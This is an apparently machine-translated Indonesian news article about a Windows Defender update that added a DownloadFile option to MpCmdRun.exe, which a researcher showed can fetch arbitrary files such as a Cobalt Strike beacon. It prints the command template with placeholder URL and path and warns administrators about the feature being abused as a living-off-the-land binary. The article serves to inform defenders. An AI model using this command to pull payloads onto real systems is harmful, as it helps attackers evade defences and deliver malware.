Windows Defender berubah menjadi aplikasi berbahaya bagi admin

Windows Defender di Windows 10 adalah garis pertahanan pertama jika terjadi serangan malware dan berfungsi sebagai pekerjaan yang cukup bagus juga.

Namun, dalam salah satu pembaruan barunya, antivirus perkasa mendapat perintah DownloadFile baru, yang memungkinkan siapa pun mengunduh file apa pun dari URL ke jalur tertentu di komputer Anda.

Kita dapat menyebut ini sebagai eksploitasi karena juga dapat digunakan untuk mengunduh malware, sesuatu yang ditemukan oleh peneliti keamanan Mohammad Askar yang diposting temuannya di Twitter.

Bagaimana Windows Defender dapat digunakan untuk mengunduh malware?

Sangat mudah untuk menggunakan Utilitas Baris Perintah Layanan Antimalware Microsoft (MpCmdRun.exe) untuk mengunduh file apa pun dari sumber eksternal ke komputer Anda.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

Dalam percobaannya, Askar dapat mengunduh Cobalt Strike beacon, alat penyerang terkenal menggunakan baris perintah ini.

Perintah baru termasuk dalam versi 4.18.2007.8-0 dan lebih tinggi yang memberikan waktu mulai yang cukup baik bagi penyerang.

Pada dasarnya, fitur ini berubah Pembela Windows menjadi LOLBIN (living off the line binary), file sistem tidak berbahaya yang dapat digunakan untuk tujuan jahat.

Untungnya, setelah Anda mengunduh file berbahaya, itu akan terdeteksi oleh Windows Defender yang sama atau yang lain perangkat lunak antivirus jika hadir.

Dari perangkat lunak perlindungan yang andal, Windows Defender berubah menjadi ancaman lain yang mungkin harus dipantau secara ketat oleh admin dan pakar keamanan.

Jika Anda memiliki saran atau komentar, silakan tinggalkan di bawah di bagian Komentar.